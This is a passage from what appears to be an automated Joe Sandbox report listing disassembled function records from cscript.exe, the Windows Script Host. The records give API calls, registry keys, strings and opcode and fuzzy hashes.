                                                      • Opcode Fuzzy Hash: b687e1b374f929a9ced613b285500b4fa60ee262f7cdca833cf06a7b28b65009
                                                      • Instruction Fuzzy Hash: 7031C571601166BF9B205FA69C4CEEB7FBEEF86364F108114F915A6292CA308D05DAF1
                                                      APIs
                                                      • SysFreeString.OLEAUT32(?), ref: 0062C850
                                                      • SysFreeString.OLEAUT32(?), ref: 0062C859
                                                      • SysFreeString.OLEAUT32(?), ref: 0062C862
                                                      • SysFreeString.OLEAUT32(?), ref: 0062C86B
                                                      • SysFreeString.OLEAUT32(?), ref: 0062C874
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: FreeString
                                                      • String ID: P?b$WScript_OnScriptTerminate
                                                      • API String ID: 3341692771-1339196017
                                                      • Opcode ID: 0c8dc19ba0b56a7033d7bd6fc10b4fe59a8e614170a82e3998a76dac1bc8203b
                                                      • Instruction ID: 1b07ba4fc34e9c57c24558016020492534bf9074eb271a138b0181e0cce36cda
                                                      • Opcode Fuzzy Hash: 0c8dc19ba0b56a7033d7bd6fc10b4fe59a8e614170a82e3998a76dac1bc8203b
                                                      • Instruction Fuzzy Hash: 16918D71A00215AFCB18CF99E894AAEBBB7FF49314F10416DE506AB390DB34AD41CB95
                                                      APIs
                                                      • RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,00000000,?,00000000,0062F129,00000000,?,?,?,80000001,80000001,?,00632623), ref: 006374BE
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,00000000,00000000,00000000,00000000,?,?,?,80000001,80000001,?,00632623,00020006), ref: 006374E0
                                                      • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00632623,00020006,?,?,?,?,0062F129), ref: 006374EC
                                                      • __alloca_probe_16.LIBCMT ref: 006374F6
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,?,00000000,00000000,00000000,?,00632623,00020006,?,?,?,?,0062F129), ref: 0063750D
                                                      • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,?,00000000,0062F129,00000000,?,00000000,00000000,00000000,?,00632623,00020006), ref: 00637526
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ByteCharCreateMultiWide$ErrorLast__alloca_probe_16
                                                      • String ID: Software\Microsoft\Windows Script Host\Settings
                                                      • API String ID: 3071801306-2126348837
                                                      • Opcode ID: 5515cc32698779cebb9f526cf07525242d3e59a485666e285463540b7d2a7b5d
                                                      • Instruction ID: 558ce394f9e8c53d1a08de6b509fed5f547db960c30ed3f348f9c9764954c0c5
                                                      • Opcode Fuzzy Hash: 5515cc32698779cebb9f526cf07525242d3e59a485666e285463540b7d2a7b5d
                                                      • Instruction Fuzzy Hash: 5511D071206134BB8B305BA7AC4DEEB3EAFEF0A3B5F104114B409D5291DA74D900EAF1
                                                      APIs
                                                      • RegSetValueExW.ADVAPI32(?,Timeout,00000000,00000004,?,00000004,?,?,?,0062F129), ref: 0063787B
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Timeout,000000FF,00000000,00000000,00000000,00000000,?,?,?,0062F129), ref: 00637892
                                                      • GetLastError.KERNEL32(?,?,00000000,00000000), ref: 0063789F
                                                      • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000004,?,00000004,?,?,?,0062F129), ref: 006378D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Value$ByteCharErrorLastMultiWide
                                                      • String ID: Timeout
                                                      • API String ID: 1054387349-1325157390
                                                      • Opcode ID: 95e864aaa7e2710a2824fc9c3ca053d36b7dcc59c6275ebcbf4909a7242843fe
                                                      • Instruction ID: 13a3e00c9372804c327891918fb0b2d53ba893f9c9ca7616707c60706ada5afe
                                                      • Opcode Fuzzy Hash: 95e864aaa7e2710a2824fc9c3ca053d36b7dcc59c6275ebcbf4909a7242843fe
                                                      • Instruction Fuzzy Hash: FE11AFB0A04224BAD7209BA69C4DFEB7F7EDF4A7A4F100128B615D62D0DA708900DBF5
                                                      APIs
                                                      • malloc.MSVCRT ref: 00636DE4
                                                      • SysStringLen.OLEAUT32(?), ref: 00636E07
                                                      • SysAllocString.OLEAUT32(?), ref: 00636E15
                                                      • SysStringLen.OLEAUT32(?), ref: 00636E25
                                                      • SysAllocString.OLEAUT32(?), ref: 00636E32
                                                      • SysFreeString.OLEAUT32(?), ref: 00636E48
                                                      • SysFreeString.OLEAUT32(?), ref: 00636E57
                                                      • free.MSVCRT(00000000,?,006364F1,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00636E5E
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: String$AllocFree$freemalloc
                                                      • String ID:
                                                      • API String ID: 945414394-0
                                                      • Opcode ID: cfdc6d86edb52bfefe442bde305a238bd0960c525573b5c9cafc8f4fae714637
                                                      • Instruction ID: 555311ac93d06dddbf9f40ced746b74472e62e510fdb1eb044cbb717291f453b
                                                      • Opcode Fuzzy Hash: cfdc6d86edb52bfefe442bde305a238bd0960c525573b5c9cafc8f4fae714637
                                                      • Instruction Fuzzy Hash: DB118C35204706AFCB219F65EC08A877BE7EF00350F10C428F85582260DB71D854DB91
                                                      APIs
                                                      • malloc.MSVCRT ref: 00636D4F
                                                      • SysStringLen.OLEAUT32(?), ref: 00636D68
                                                      • SysAllocString.OLEAUT32(?), ref: 00636D76
                                                      • SysStringLen.OLEAUT32(?), ref: 00636D86
                                                      • SysAllocString.OLEAUT32(?), ref: 00636D93
                                                      • SysFreeString.OLEAUT32(?), ref: 00636DA9
                                                      • SysFreeString.OLEAUT32(?), ref: 00636DB8
                                                      • free.MSVCRT(00000000,?,00636491,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00636DBF
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: String$AllocFree$freemalloc
                                                      • String ID:
                                                      • API String ID: 945414394-0
                                                      • Opcode ID: 59c494485c87279ae45ccebaa72fe1aff4aaf255faa1426caeac3e862f434b5f
                                                      • Instruction ID: 8e10020601ba1e8514570415327468b7c864df93c423dea0d96ca9bee609a6c7
                                                      • Opcode Fuzzy Hash: 59c494485c87279ae45ccebaa72fe1aff4aaf255faa1426caeac3e862f434b5f
                                                      • Instruction Fuzzy Hash: F9117C31600716AFCB219F65EC08A9B7BE7EF00760F14C529F89AC66A0DB31D850EBD1
                                                      APIs
                                                      • SysFreeString.OLEAUT32(?), ref: 00634F81
                                                      • SysFreeString.OLEAUT32(?), ref: 00634F8A
                                                      • SysFreeString.OLEAUT32(?), ref: 00634F93
                                                      • SysFreeString.OLEAUT32(?), ref: 00634F9C
                                                      • SysFreeString.OLEAUT32(?), ref: 00634FA5
                                                      Strings
                                                      • WScript_OnScriptTerminate, xrefs: 00634EE1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: FreeString
                                                      • String ID: WScript_OnScriptTerminate
                                                      • API String ID: 3341692771-526745235
                                                      • Opcode ID: 28a55a2a868b6db2428f3e6c59af3823f1d90064f209b387dee5d415e97f07a3
                                                      • Instruction ID: 92489c246a6f56262500c79b0d5c90f37a2d2c9fd59664c40c9401c658027211
                                                      • Opcode Fuzzy Hash: 28a55a2a868b6db2428f3e6c59af3823f1d90064f209b387dee5d415e97f07a3
                                                      • Instruction Fuzzy Hash: E7814A71A002169FCB18DF94D885AAEBBB6FF88314F14016DE512A73A0DF34BD41CB95
                                                      APIs
                                                      • GetSystemDirectoryA.KERNEL32(?,00000000), ref: 0062B120
                                                      • GetSystemDirectoryA.KERNEL32(00000000,00000001), ref: 0062B158
                                                      • strcpy_s.MSVCRT ref: 0062B172
                                                      • strcpy_s.MSVCRT ref: 0062B183
                                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000800), ref: 0062B194
                                                      • GetLastError.KERNEL32 ref: 00631212
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: DirectorySystemstrcpy_s$ErrorLastLibraryLoad
                                                      • String ID:
                                                      • API String ID: 3723718217-0
                                                      • Opcode ID: e65554dbc831ec1bc58e79afaceb6e5d5e4b54386157aa627789bf453cd0d7a2
                                                      • Instruction ID: b404b3ce3c6277119cf66925e6d75b689e96ff0d6e282f993f9755a98bdc7551
                                                      • Opcode Fuzzy Hash: e65554dbc831ec1bc58e79afaceb6e5d5e4b54386157aa627789bf453cd0d7a2
                                                      • Instruction Fuzzy Hash: EB213872A046269BC3119FA4AC58BAB77EAEF44300F180069F845DB300EB35D9449BE1
                                                      APIs
                                                      • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383},00000000,00000001,?,?), ref: 00637F1B
                                                      • RegQueryValueExW.ADVAPI32(?,Locale,00000000,00000000,00638772,00000006,00000000), ref: 00637F38
                                                      • RegCloseKey.ADVAPI32(?), ref: 00637F43
                                                      • _wcsnicmp.MSVCRT ref: 00637F5B
                                                      Strings
                                                      • Locale, xrefs: 00637F30
                                                      • Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}, xrefs: 00637F11
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue_wcsnicmp
                                                      • String ID: Locale$Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
                                                      • API String ID: 2262609651-1161606707
                                                      • Opcode ID: 3bb8cfaf2d454a49458f9bac0bb0ae1af6d31fd9402ff0b9c601867da5f63d90
                                                      • Instruction ID: 2ea5f4b7f7cf65713e0ff86c77c756840ae80189fffb47d25b7aea6f7a3054df
                                                      • Opcode Fuzzy Hash: 3bb8cfaf2d454a49458f9bac0bb0ae1af6d31fd9402ff0b9c601867da5f63d90
                                                      • Instruction Fuzzy Hash: BA1191B5904119ABCB309FA5ED08EEF77BBFB94744F111019E952A3260D6709901DBB1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                      • Instruction ID: bff2ce5f69f72d2f318806ce968b7d384d218ff7223909b9b82670df886c02cd
                                                      • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                      • Instruction Fuzzy Hash: 9F021771609341AFD305CF18C494A6FBBE6EFC8718F048A6DF9868B254DB31E945CB52
                                                      APIs
                                                      • CreateFileW.KERNEL32(0062B2EA,80000000,00000001,00000000,00000003,08000000,00000000,?,00000000,?,000000FF,000000FF,?,0062B2EA,?), ref: 0062B547
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0062B2EA,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,000000FF,000000FF,?,0062B2EA,?), ref: 006313BA
                                                      • __alloca_probe_16.LIBCMT ref: 006313C6
                                                      • GetLastError.KERNEL32(?,0062B2EA,?,?,?,?,00000000,00000000), ref: 006313DB
                                                        • Part of subcall function 0062B580: GetFileSize.KERNEL32(0062B2EA,00000000,00000000,?,0062B55F,00000000,?,?,0062B2EA,?,?,?,?,00000000,00000000), ref: 0062B595
                                                        • Part of subcall function 0062B580: CreateFileMappingA.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0062B5B6
                                                        • Part of subcall function 0062B580: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,0062B55F,00000000,?,?,0062B2EA,?,?,?,?,00000000), ref: 0062B5D0
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: File$Create$ByteCharErrorLastMappingMultiSizeViewWide__alloca_probe_16
                                                      • String ID:
                                                      • API String ID: 3211943082-0
                                                      • Opcode ID: 0c08939f797a0aac9bc70ea5d757a2048d90b59e09b7b9a9cdbd7d3763fd221b
                                                      • Instruction ID: 30326bb4f1889817cbc115732a041c25b519dda6b3ed983c50279cb9a99cdcd5
                                                      • Opcode Fuzzy Hash: 0c08939f797a0aac9bc70ea5d757a2048d90b59e09b7b9a9cdbd7d3763fd221b
                                                      • Instruction Fuzzy Hash: 5521D530201625BAE7205F6AAC49FDB7E6FDF067A5F200218B515B92D1D7B09940DAF4
                                                      APIs
                                                      • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?,?,?,?,80000000,80000000,?,00627F9E,?,?,?,?), ref: 00628134
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,80000000,80000000,?,00627F9E,?), ref: 00630495
                                                      • __alloca_probe_16.LIBCMT ref: 006304A2
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000,?,00627F9E,?,?,?,?,?), ref: 006304B6
                                                      • RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,00020019,?,?,?,?,80000000,80000000,?,00627F9E,?,?,?,?), ref: 006304D1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiOpenWide$__alloca_probe_16
                                                      • String ID:
                                                      • API String ID: 2527192001-0
                                                      • Opcode ID: 4f1fcbebf8f412db3874364d6515ab0adfec11c8b85eafbf848cd9edf4339821
                                                      • Instruction ID: 84b0aad64b3d743ff656fcaaad980ef76ac2e8963edf7dca079076d04238ae35
                                                      • Opcode Fuzzy Hash: 4f1fcbebf8f412db3874364d6515ab0adfec11c8b85eafbf848cd9edf4339821
                                                      • Instruction Fuzzy Hash: 4A11C870A01215FEFB209B766C08FBB7AEEEB44764F104519B955D62D2EA70CD04DAF0
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,00000000,00000000,?,00000000,00000000,?,00638764,00000000), ref: 00638251
                                                      • CreateFileMappingW.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000,?,00638764,00000000,?,?,?,?,00000000), ref: 00638265
                                                      • CloseHandle.KERNEL32(00000000,?,00638764,00000000,?,?,?,?,00000000), ref: 0063826E
                                                      • MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,00638764,00000000,?,?,?,?,00000000), ref: 0063827E
                                                      • CloseHandle.KERNEL32(00000000,?,00638764,00000000,?,?,?,?,00000000), ref: 00638287
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,00000000,00000000,?,00638764,00000000,?,?,?,?,00000000), ref: 006382A4
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: File$CloseCreateHandle$LibraryLoadMappingView
                                                      • String ID:
                                                      • API String ID: 1262414356-0
                                                      • Opcode ID: 486725c5a4b63b5ada0cd88428f99ba37fafa3050034d58eed4083731ab5f559
                                                      • Instruction ID: 0500b6cda6829f0877ff67811d9f0d715019c14965d350a8a331d59a9cb66ea0
                                                      • Opcode Fuzzy Hash: 486725c5a4b63b5ada0cd88428f99ba37fafa3050034d58eed4083731ab5f559
                                                      • Instruction Fuzzy Hash: 18017CB2A117187EF32016B95C8CFBB661EDB81BA9F254128B90593290DE798E0161F0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-$0$0
                                                      • API String ID: 1302938615-699404926
                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction ID: 8ea8b20c90f8ad04a871fb56670030744011d0849de77c8b79dc5c6628c62395
                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction Fuzzy Hash: 2B819070E092499FDF288E68C8917FEBBA1EF45350F1A45E9D861A7290F735B840CB54
                                                      APIs
                                                      • SysFreeString.OLEAUT32(?), ref: 00627E00
                                                        • Part of subcall function 00628156: GetFullPathNameW.KERNEL32(0062ECAE,00000104,?,?,?,?,?,?,?,?), ref: 00628188
                                                      • SysAllocString.OLEAUT32(?), ref: 00627D2B
                                                      • SysAllocString.OLEAUT32(?), ref: 00627D45
                                                        • Part of subcall function 0062B1D0: LoadLibraryExW.KERNEL32(WLDP.DLL,00000000,00000800,?,00000000,?,00627DA1,?,?,?,?,?,?,?), ref: 0062B1E9
                                                        • Part of subcall function 0062B1D0: GetProcAddress.KERNEL32(00000000,WldpGetLockdownPolicy), ref: 0062B1FF
                                                        • Part of subcall function 0062B1D0: GetProcAddress.KERNEL32(00000000,WldpIsClassInApprovedList), ref: 0062B216
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00627DA4
                                                        • Part of subcall function 0062AE90: GetProcAddress.KERNEL32(00000000,SaferIdentifyLevel), ref: 0062AF21
                                                        • Part of subcall function 0062AE90: GetProcAddress.KERNEL32(00000000,SaferComputeTokenFromLevel), ref: 0062AF3B
                                                        • Part of subcall function 0062AE90: GetProcAddress.KERNEL32(00000000,SaferCloseLevel), ref: 0062AF55
                                                        • Part of subcall function 0062AE90: memset.MSVCRT ref: 0062AF7D
                                                        • Part of subcall function 0062AE90: memset.MSVCRT ref: 0062AFB9
                                                        • Part of subcall function 006262F0: SendMessageA.USER32(?,00000402,00000000,00000000), ref: 006263D6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$String$Allocmemset$CloseFreeFullHandleLibraryLoadMessageNamePathSend
                                                      • String ID: .wsf
                                                      • API String ID: 2713354114-2429851548
                                                      • Opcode ID: 67e1a81dfb4759553a4ee0530289dcff9d402c2308b2e76a46bc2b4f5c027850
                                                      • Instruction ID: 37202b40ff038a250ac22914dea66272cb3321be3890e5d227ddbcf5d1dad52d
                                                      • Opcode Fuzzy Hash: 67e1a81dfb4759553a4ee0530289dcff9d402c2308b2e76a46bc2b4f5c027850
                                                      • Instruction Fuzzy Hash: F571F935A006399BDB249F54DCA8BAE77B7AF44310F1501ADEC06A7351CA349E458FE1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$[$]:%u
                                                      • API String ID: 48624451-2819853543
                                                      • Opcode ID: e4c53a90daac59a4f1a419f58b50898771fac37071ad950575c6e8fe55aa61c4
                                                      • Instruction ID: 29021a9f5e6112f0050980cf6461b244928ffcc0668c35790bd6476ade5b03bd
                                                      • Opcode Fuzzy Hash: e4c53a90daac59a4f1a419f58b50898771fac37071ad950575c6e8fe55aa61c4
                                                      • Instruction Fuzzy Hash: E721567AA001199BDB10DFB9C941ABEB7F9EF94684F040195F905D3200E731EA01DBA1
                                                      APIs
                                                      • RegOpenKeyExA.ADVAPI32(80000000,WSFFile,00000000,0002001F,?,Open2,?,00000001,WSFFile,?,006329F1,00000000), ref: 00632A48
                                                      • RegCloseKey.ADVAPI32(?,?,Open2,?,006329F1,00000000), ref: 00632A8C
                                                        • Part of subcall function 00632B00: RegOpenKeyExA.ADVAPI32(?,ScriptEngine,00000000,00020019,?,00000000,?,?,00632A5F,?,006329F1,00000000), ref: 00632B18
                                                        • Part of subcall function 00632B00: RegCloseKey.ADVAPI32(?,?,00632A5F,?,006329F1,00000000), ref: 00632B27
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CloseOpen
                                                      • String ID: Open2$Shell$WSFFile
                                                      • API String ID: 47109696-847890310
                                                      • Opcode ID: 498ade761c151c7bba0acc84c98ffe070bc19fb296c43d720d20a100667103d3
                                                      • Instruction ID: fe42456c397176e755fa585755b44b20f4499b43d9cf461c67bc79fbaff36b25
                                                      • Opcode Fuzzy Hash: 498ade761c151c7bba0acc84c98ffe070bc19fb296c43d720d20a100667103d3
                                                      • Instruction Fuzzy Hash: 2201D432B00167BB97345AA99C65AABBBABDF90794F21413AFD06E7301D6608D0092E0
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(urlmon.dll,00000000,00000800,00000000,?,?,?,0062DA13,?,?,?,00627E67,00000000,000000FF,?), ref: 0062DA50
                                                      • GetProcAddress.KERNEL32(00000000,CreateURLMonikerEx), ref: 0062DA69
                                                      • GetLastError.KERNEL32(?,0062DA13,?,?,?,00627E67,00000000,000000FF,?,?,?,?), ref: 00631C51
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: AddressErrorLastLibraryLoadProc
                                                      • String ID: CreateURLMonikerEx$urlmon.dll
                                                      • API String ID: 3511525774-3151727589
                                                      • Opcode ID: ef6abfdbf69b5c32ee2ae5218303a04096f153f4cbf8353a282be6a83f282dd1
                                                      • Instruction ID: dbc758a2ae34a5e69314aa6d14d3f81ed93e0bb167cce096ce4c7df8cfd43659
                                                      • Opcode Fuzzy Hash: ef6abfdbf69b5c32ee2ae5218303a04096f153f4cbf8353a282be6a83f282dd1
                                                      • Instruction Fuzzy Hash: 580164712082226BD7105B54BC05FA637DBE7E0752F045014E904C7351DAA6CC028EF1
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(kernel32.dll,00000000,00000800,-00000001,?,-00000004,?,?,00627147,00000000,00000001), ref: 0062A8FA
                                                      • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 0062A90C
                                                      • FreeLibrary.KERNEL32(00000000,?,?,00627147,00000000,00000001), ref: 0062A939
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: HeapSetInformation$kernel32.dll
                                                      • API String ID: 145871493-3597996958
                                                      • Opcode ID: ae09475990049fb8ca392c60161d3d6e18abf36c0f5c8918c64b95ff9b296e9a
                                                      • Instruction ID: 4f7a2a10b6a1be428d0169971ef00fa652e34363b25f9a6962c82a55dcb4aeed
                                                      • Opcode Fuzzy Hash: ae09475990049fb8ca392c60161d3d6e18abf36c0f5c8918c64b95ff9b296e9a
                                                      • Instruction Fuzzy Hash: DFF02D31B1072177D32017F77C49E6B39AFD7C1B51F160034F552E1340EAA4CC419AA2
                                                      APIs
                                                        • Part of subcall function 00632AB3: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,00632BFE,Open2,00000000,WSFFile,?,00632BFE,?,?,?,?,Open2,00000000), ref: 00632ACF
                                                        • Part of subcall function 00632AB3: RegCreateKeyA.ADVAPI32(80000001,?,00632BFE), ref: 00632ADE
                                                        • Part of subcall function 00632B3F: RegOpenKeyExA.ADVAPI32(?,Shell,00000000,00020006,?,00000000,?,?,00632A72,?,Open2,?,006329F1,00000000), ref: 00632B53
                                                        • Part of subcall function 00632B3F: RegSetValueExA.ADVAPI32(?,00623EFE,00000000,00000001,006329F1,00000001,?,00632A72,?,Open2,?,006329F1,00000000), ref: 00632B89
                                                        • Part of subcall function 00632B3F: RegCloseKey.ADVAPI32(?,?,00632A72,?,Open2,?,006329F1,00000000), ref: 00632B94
                                                      • RegCloseKey.ADVAPI32(?,?,Open2,?,?,?,?,Open2,00000000), ref: 00632C1E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CloseOpen$CreateValue
                                                      • String ID: Open2$SOFTWARE\Classes\%s\%s$Shell$WSFFile
                                                      • API String ID: 314704141-1287852826
                                                      • Opcode ID: 2aed4c2c7cd6e1aa17da44f7fb479258fcef7765135b842c1e34ebdc5c54e2fc
                                                      • Instruction ID: ead4c09f01540e4e91d6b8d18e6979debf4877751043af4645f08f69a262d494
                                                      • Opcode Fuzzy Hash: 2aed4c2c7cd6e1aa17da44f7fb479258fcef7765135b842c1e34ebdc5c54e2fc
                                                      • Instruction Fuzzy Hash: BB01DB7190023567C72497649C15DDEB7BADB94710F0101A5FD44A3340DBB49E858DD0
                                                      APIs
                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 006280BD
                                                      • __alloca_probe_16.LIBCMT ref: 006303EF
                                                      • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 00630407
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,?,?,?,?,?), ref: 0063043D
                                                      • GetLastError.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?), ref: 0063044B
                                                      Memory Dump Source
